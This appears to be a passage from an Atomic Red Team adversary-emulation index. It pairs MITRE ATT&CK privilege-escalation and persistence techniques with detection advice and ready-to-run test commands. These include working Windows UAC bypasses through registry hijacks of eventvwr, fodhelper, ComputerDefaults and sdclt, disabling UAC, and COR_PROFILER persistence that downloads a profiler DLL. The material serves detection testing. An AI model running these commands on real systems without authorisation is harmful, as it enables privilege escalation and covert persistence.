attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf + description: |- + Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming)  These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel. + + Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges. + name: Boot or Logon Autostart Execution + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1547 + url: https://attack.mitre.org/techniques/T1547 + - external_id: CAPEC-564 + source_name: capec + url: https://capec.mitre.org/data/definitions/564.html + - url: http://msdn.microsoft.com/en-us/library/aa376977 + description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November + 12, 2014. + source_name: Microsoft Run Key + - url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx + description: Microsoft. (n.d.). Authentication Packages. Retrieved March 1, + 2017. + source_name: MSDN Authentication Packages + - url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx + description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018. + source_name: Microsoft TimeProvider + - url: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order + description: 'Langendorf, S. (2013, September 24). Windows Registry Persistence, + Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.' + source_name: Cylance Reg Persistence Sept 2013 + - source_name: Linux Kernel Programming + url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf + description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel + Module Programming Guide. Retrieved April 6, 2018. + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-04-24T13:50:12.837Z' + created: '2020-01-23T17:46:59.535Z' + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_detection: "Monitor for additions or modifications of mechanisms that + could be used to trigger autostart execution, such as relevant additions to + the Registry. Look for changes that are not correlated with known updates, + patches, or other planned administrative activity. Tools such as Sysinternals + Autoruns may also be used to detect system autostart configuration changes + that could be attempts at persistence.(Citation: TechNet Autoruns) Changes + to some autostart configuration settings may happen under normal conditions + when legitimate software is installed. \n\nSuspicious program execution as + autostart programs may show up as outlier processes that have not been seen + before when compared against historical data.To increase confidence of malicious + activity, data and events should not be viewed in isolation, but as part of + a chain of behavior that could lead to other activities, such as network connections + made for Command and Control, learning details about the environment through + Discovery, and Lateral Movement.\n\nMonitor DLL loads by processes, specifically + looking for DLLs that are not recognized or not normally loaded into a process. + Look for abnormal process behavior that may be due to a process loading a + malicious DLL.\n\nMonitor for abnormal usage of utilities and command-line + parameters involved in kernel modification or driver installation." + x_mitre_permissions_required: + - User + - Administrator + - root + x_mitre_is_subtechnique: false + x_mitre_version: '1.1' + x_mitre_data_sources: + - 'File: File Creation' + - 'Windows Registry: Windows Registry Key Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'File: File Modification' + - 'Command: Command Execution' + - 'Process: Process Creation' + - 'Module: Module Load' + - 'Kernel: Kernel Module Load' + - 'Driver: Driver Load' + - 'Process: OS API Execution' + atomic_tests: [] + T1037: + technique: + id: attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Boot or Logon Initialization Scripts + description: "Adversaries may use scripts automatically executed at boot or + logon initialization to establish persistence. Initialization scripts can + be used to perform administrative functions, which may often execute other + programs or send information to an internal logging server. These scripts + can vary based on operating system and whether applied locally or remotely. + \ \n\nAdversaries may use these scripts to maintain persistence on a single + system. Depending on the access configuration of the logon scripts, either + local credentials or an administrator account may be necessary. \n\nAn adversary + may also be able to escalate their privileges since some boot or logon initialization + scripts run with higher privileges." + external_references: + - source_name: mitre-attack + external_id: T1037 + url: https://attack.mitre.org/techniques/T1037 + - external_id: CAPEC-564 + source_name: capec + url: https://capec.mitre.org/data/definitions/564.html + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-04-27T19:58:02.332Z' + created: '2017-05-31T21:30:38.910Z' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - macOS + - Windows + - Linux + x_mitre_detection: Monitor logon scripts for unusual access by abnormal users + or at abnormal times. Look for files added or modified by unusual accounts + outside of normal administration duties. Monitor running process for actions + that could be indicative of abnormal programs or executables running upon + logon. + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Creation' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Active Directory: Active Directory Object Modification' + - 'File: File Creation' + - 'File: File Modification' + x_mitre_version: '2.1' + atomic_tests: [] + T1548.002: + technique: + created: '2020-01-30T14:24:34.977Z' + modified: '2020-07-22T21:36:52.458Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + external_references: + - source_name: mitre-attack + external_id: T1548.002 + url: https://attack.mitre.org/techniques/T1548/002 + - url: https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works + description: Lich, B. (2016, May 31). How User Account Control Works. Retrieved + June 3, 2016. + source_name: TechNet How UAC Works + - url: https://technet.microsoft.com/en-US/magazine/2009.07.uac.aspx + description: 'Russinovich, M. (2009, July). User Account Control: Inside Windows + 7 User Account Control. Retrieved July 26, 2016.' + source_name: TechNet Inside UAC + - url: https://msdn.microsoft.com/en-us/library/ms679687.aspx + description: Microsoft. (n.d.). The COM Elevation Moniker. Retrieved July + 26, 2016. + source_name: MSDN COM Elevation + - url: http://www.pretentiousname.com/misc/win7_uac_whitelist2.html + description: Davidson, L. (n.d.). Windows 7 UAC whitelist. Retrieved November + 12, 2014. + source_name: Davidson Windows + - url: https://github.com/hfiref0x/UACME + description: UACME Project. (2016, June 16). UACMe. Retrieved July 26, 2016. + source_name: Github UACMe + - url: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ + description: Nelson, M. (2016, August 15). "Fileless" UAC Bypass using eventvwr.exe + and Registry Hijacking. Retrieved December 27, 2016. + source_name: enigma0x3 Fileless UAC Bypass + - url: https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware + description: Salvio, J., Joven, R. (2016, December 16). Malicious Macro Bypasses + UAC to Elevate Privilege for Fareit Malware. Retrieved December 27, 2016. + source_name: Fortinet Fareit + - url: http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass + description: Medin, T. (2013, August 8). PsExec UAC Bypass. Retrieved June + 3, 2016. + source_name: SANS UAC Bypass + - url: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/ + description: Nelson, M. (2017, March 14). Bypassing UAC using App Paths. Retrieved + May 25, 2017. + source_name: enigma0x3 sdclt app paths + - url: https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/ + description: Nelson, M. (2017, March 17). "Fileless" UAC Bypass Using sdclt.exe. + Retrieved May 25, 2017. + source_name: enigma0x3 sdclt bypass + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Bypass User Account Control + description: |- + Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works) + + If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows) + + Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as: + + * eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit) + + Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass) + id: attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073 + x_mitre_defense_bypassed: + - Windows User Account Control + x_mitre_version: '2.0' + x_mitre_is_subtechnique: true + x_mitre_effective_permissions: + - Administrator + x_mitre_permissions_required: + - Administrator + - User + x_mitre_detection: |- + There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Monitor process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes. + + Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. For example: + + * The eventvwr.exe bypass uses the [HKEY_CURRENT_USER]\Software\Classes\mscfile\shell\open\command Registry key.(Citation: enigma0x3 Fileless UAC Bypass) + + * The sdclt.exe bypass uses the [HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe and [HKEY_CURRENT_USER]\Software\Classes\exefile\shell\runas\command\isolatedCommand Registry keys.(Citation: enigma0x3 sdclt app paths)(Citation: enigma0x3 sdclt bypass) + + Analysts should monitor these Registry settings for unauthorized changes. + x_mitre_data_sources: + - 'Process: Process Metadata' + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + x_mitre_contributors: + - Stefan Kanthak + - Casey Smith + x_mitre_platforms: + - Windows + identifier: T1548.002 + atomic_tests: + - name: Bypass UAC using Event Viewer (cmd) + auto_generated_guid: 5073adf8-9a50-4bd9-b298-a9bd2ead8af9 + description: | + Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ + Upon execution command prompt should be launched with administrative privelages + supported_platforms: + - windows + input_arguments: + executable_binary: + description: Binary to execute with UAC Bypass + type: path + default: C:\Windows\System32\cmd.exe + executor: + command: | + reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f + cmd.exe /c eventvwr.msc + cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1 + +' + name: command_prompt + - name: Bypass UAC using Event Viewer (PowerShell) + auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b + description: | + PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ + Upon execution command prompt should be launched with administrative privelages + supported_platforms: + - windows + input_arguments: + executable_binary: + description: Binary to execute with UAC Bypass + type: path + default: C:\Windows\System32\cmd.exe + executor: + command: | + New-Item "HKCU:\software\classes\mscfile\shell\open\command" -Force + Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force + Start-Process "C:\Windows\System32\eventvwr.msc" + cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse + -ErrorAction Ignore + +' + name: powershell + - name: Bypass UAC using Fodhelper + auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182 + description: | + Bypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. + Upon execution, "The operation completed successfully." will be shown twice and command prompt will be opened. + supported_platforms: + - windows + input_arguments: + executable_binary: + description: Binary to execute with UAC Bypass + type: path + default: C:\Windows\System32\cmd.exe + executor: + command: | + reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f + reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute" /f + fodhelper.exe + cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f >nul + 2>&1 + +' + name: command_prompt + - name: Bypass UAC using Fodhelper - PowerShell + auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa + description: | + PowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. + Upon execution command prompt will be opened. + supported_platforms: + - windows + input_arguments: + executable_binary: + description: Binary to execute with UAC Bypass + type: path + default: C:\Windows\System32\cmd.exe + executor: + command: | + New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force + New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force + Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force + Start-Process "C:\Windows\System32\fodhelper.exe" + cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force + -Recurse -ErrorAction Ignore + +' + name: powershell + - name: Bypass UAC using ComputerDefaults (PowerShell) + auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f + description: | + PowerShell code to bypass User Account Control using ComputerDefaults.exe on Windows 10 + Upon execution administrative command prompt should open + supported_platforms: + - windows + input_arguments: + executable_binary: + description: Binary to execute with UAC Bypass + type: path + default: C:\Windows\System32\cmd.exe + executor: + command: | + New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force + New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force + Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force + Start-Process "C:\Windows\System32\ComputerDefaults.exe" + cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force + -Recurse -ErrorAction Ignore + +' + name: powershell + elevation_required: true + - name: Bypass UAC by Mocking Trusted Directories + auto_generated_guid: f7a35090-6f7f-4f64-bb47-d657bf5b10c1 + description: | + Creates a fake "trusted directory" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched systems + Upon execution the directory structure should exist if the system is patched, if unpatched Microsoft Management Console should launch + supported_platforms: + - windows + input_arguments: + executable_binary: + description: Binary to execute with UAC Bypass + type: path + default: C:\Windows\System32\cmd.exe + executor: + command: | + mkdir "\\?\C:\Windows \System32\" + copy "#{executable_binary}" "\\?\C:\Windows \System32\mmc.exe" + mklink c:\testbypass.exe "\\?\C:\Windows \System32\mmc.exe" + cleanup_command: | + rd "\\?\C:\Windows \" /S /Q >nul 2>nul + del "c:\testbypass.exe" >nul 2>nul + name: command_prompt + elevation_required: true + - name: Bypass UAC using sdclt DelegateExecute + auto_generated_guid: 3be891eb-4608-4173-87e8-78b494c029b7 + description: | + Bypasses User Account Control using a fileless method, registry only. + Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe + [Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass) + Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1) + supported_platforms: + - windows + input_arguments: + command.to.execute: + description: Command to execute + type: string + default: cmd.exe /c notepad.exe + executor: + command: | + New-Item -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Value '#{command.to.execute}' + New-ItemProperty -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute" + Start-Process -FilePath $env:windir\system32\sdclt.exe + Start-Sleep -s 3 + cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse + -Force -ErrorAction Ignore + +' + name: powershell + - name: Disable UAC using reg.exe + auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 + description: | + Disable User Account Conrol (UAC) using the builtin tool reg.exe by changing its registry key + HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0 + supported_platforms: + - windows + executor: + command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System + /v EnableLUA /t REG_DWORD /d 0 /f + +' + cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System + /v EnableLUA /t REG_DWORD /d 1 /f + +' + name: command_prompt + elevation_required: true + T1574.012: + technique: + external_references: + - source_name: mitre-attack + external_id: T1574.012 + url: https://attack.mitre.org/techniques/T1574/012 + - source_name: Microsoft Profiling Mar 2017 + url: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/profiling-overview + description: Microsoft. (2017, March 30). Profiling Overview. Retrieved June + 24, 2020. + - source_name: Microsoft COR_PROFILER Feb 2013 + url: https://docs.microsoft.com/en-us/previous-versions/dotnet/netframework-4.0/ee471451(v=vs.100) + description: Microsoft. (2013, February 4). Registry-Free Profiler Startup + and Attach. Retrieved June 24, 2020. + - source_name: RedCanary Mockingbird May 2020 + url: https://redcanary.com/blog/blue-mockingbird-cryptominer/ + description: Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved + May 26, 2020. + - source_name: Red Canary COR_PROFILER May 2020 + url: https://redcanary.com/blog/cor_profiler-for-persistence/ + description: Brown, J. (2020, May 7). Detecting COR_PROFILER manipulation + for persistence. Retrieved June 24, 2020. + - source_name: Almond COR_PROFILER Apr 2019 + url: https://offsec.almond.consulting/UAC-bypass-dotnet.html + description: Almond. (2019, April 30). UAC bypass via elevated .NET applications. + Retrieved June 24, 2020. + - source_name: GitHub OmerYa Invisi-Shell + url: https://github.com/OmerYa/Invisi-Shell + description: Yair, O. (2019, August 19). Invisi-Shell. Retrieved June 24, + 2020. + - source_name: subTee .NET Profilers May 2017 + url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html + description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET + Profilers. Retrieved June 24, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: COR_PROFILER + description: |- + Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013) + + The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013) + + Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017) + id: attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-06-26T16:09:58.920Z' + created: '2020-06-24T22:30:55.843Z' + x_mitre_detection: 'For detecting system and user scope abuse of the COR_PROFILER, + monitor the Registry for changes to COR_ENABLE_PROFILING, COR_PROFILER, and + COR_PROFILER_PATH that correspond to system and user environment variables + that do not correlate to known developer tools. Extra scrutiny should be placed + on suspicious modification of these Registry keys by command line tools like + wmic.exe, setx.exe, and [Reg](https://attack.mitre.org/software/S0075), monitoring + for command-line arguments indicating a change to COR_PROFILER variables may + aid in detection. For system, user, and process scope abuse of the COR_PROFILER, + monitor for new suspicious unmanaged profiling DLLs loading into .NET processes + shortly after the CLR causing abnormal process behavior.(Citation: Red Canary + COR_PROFILER May 2020) Consider monitoring for DLL files that are associated + with COR_PROFILER environment variables.' + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Modification' + - 'Process: Process Creation' + - 'Module: Module Load' + - 'Command: Command Execution' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + - Administrator + x_mitre_contributors: + - Jesse Brown, Red Canary + x_mitre_platforms: + - Windows + identifier: T1574.012 + atomic_tests: + - name: User scope COR_PROFILER + auto_generated_guid: 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a + description: | + Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER). + The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process. + Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. + If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however, + the notepad process will not execute with high integrity. + + Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ + supported_platforms: + - windows + input_arguments: + file_name: + description: unmanaged profiler DLL + type: Path + default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll + clsid_guid: + description: custom clsid guid + type: String + default: "{09108e71-974c-4010-89cb-acf471ae9e2c}" + dependency_executor_name: powershell + dependencies: + - description: "#{file_name} must be present\n" + prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" + executor: + command: | + Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan + New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null + New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null + New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null + New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null + Write-Host "executing eventvwr.msc" -ForegroundColor Cyan + START MMC.EXE EVENTVWR.MSC + cleanup_command: "Remove-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\" + -Recurse -Force -ErrorAction Ignore \nRemove-ItemProperty -Path HKCU:\\Environment + -Name \"COR_ENABLE_PROFILING\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty + -Path HKCU:\\Environment -Name \"COR_PROFILER\" -Force -ErrorAction Ignore + | Out-Null\nRemove-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\" + -Force -ErrorAction Ignore | Out-Null\n" + name: powershell + - name: System Scope COR_PROFILER + auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310 + description: | + Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect. + The unmanaged profiler DLL (T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity + level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will + still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity. + + Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ + supported_platforms: + - windows + input_arguments: + file_name: + description: unmanaged profiler DLL + type: Path + default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll + clsid_guid: + description: custom clsid guid + type: String + default: "{09108e71-974c-4010-89cb-acf471ae9e2c}" + dependency_executor_name: powershell + dependencies: + - description: "#{file_name} must be present\n" + prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" + executor: + command: | + Write-Host "Creating system environment variables" -ForegroundColor Cyan + New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null + New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null + New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null + cleanup_command: | + Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null + Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null + Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null + name: powershell + elevation_required: true + - name: Registry-free process scope COR_PROFILER + auto_generated_guid: 79d57242-bbef-41db-b301-9d01d9f6e817 + description: | + Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell. + + Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ + supported_platforms: + - windows + input_arguments: + file_name: + description: unamanged profiler DLL + type: Path + default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll + clsid_guid: + description: custom clsid guid + type: String + default: "{09108e71-974c-4010-89cb-acf471ae9e2c}" + dependency_executor_name: powershell + dependencies: + - description: "#{file_name} must be present\n" + prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" + executor: + command: | + $env:COR_ENABLE_PROFILING = 1 + $env:COR_PROFILER = '#{clsid_guid}' + $env:COR_PROFILER_PATH = '#{file_name}' + POWERSHELL -c 'Start-Sleep 1' + cleanup_command: | + $env:COR_ENABLE_PROFILING = 0 + $env:COR_PROFILER = '' + $env:COR_PROFILER_PATH = '' + name: powershell + T1546.001: + technique: + created: '2020-01-24T13:40:47.282Z' + modified: '2020-01-24T13:40:47.282Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + type: attack-pattern + id: attack-pattern--98034fef-d9fb-4667-8dc4-2eab6231724c + description: "Adversaries may establish persistence by executing malicious content + triggered by a file type association. When a file is opened, the default program + used to open the file (also called the file association or handler) is checked. + File association selections are stored in the Windows Registry and can be + edited by users, administrators, or programs that have Registry access (Citation: + Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or + by administrators using the built-in assoc utility. (Citation: Microsoft Assoc + Oct 2017) Applications can modify the file association for a given file extension + to call an arbitrary program when a file with the given extension is opened.\n\nSystem + file associations are listed under HKEY_CLASSES_ROOT\\.[extension], + for example HKEY_CLASSES_ROOT\\.txt. The entries point to a handler + for that extension located at HKEY_CLASSES_ROOT\\[handler]. The + various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\\[handler]\\shell\\[action]\\command. + For example: \n* HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command\n* + HKEY_CLASSES_ROOT\\txtfile\\shell\\print\\command\n* 